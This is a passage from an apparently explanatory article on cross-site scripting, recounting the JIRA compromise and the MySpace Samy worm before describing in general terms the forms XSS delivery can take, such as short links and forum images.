This can have huge ramifications, especially on larger Content Management System (CMS) platforms and even social media websites. The software project management service, JIRA, found itself the target of an XSS exploit that affected large software companies such as the Apache foundation. This caused administrator accounts to become compromised, which could have led to a cascade effect of further data compromise, company secrets, proprietary software, etc. In fact, if you were ever a user of MySpace (remember that website?), you probably heard of the most infamous XSS exploit: the JS.Spacehero worm, also known as the MySpace Samy worm. These attacks not only caused serious problems with account compromises, but considerable financial loss as well. Even though the Samy worm was basically harmless, it caused an exponential spread in less than a day that forced MySpace to take itself offline for several hours, reportedly costing them over $1 million USD in revenue.

Different Types Of XSS Attacks

XSS exploits can take a number of forms, which makes them very difficult for website users to detect. An innocuous short-URL link (like TinyURL or Bitly) to a website, a forum signature image, a modified website address, even something completely hidden from view (e.g. obfuscation, where it is written in an intentionally confusing, illegible manner) – any of these and more can be used to accomplish an XSS exploit. In fact, if a user's browser can load it (such as an image) or execute it (such as code), there exists opportunity for an XSS exploit.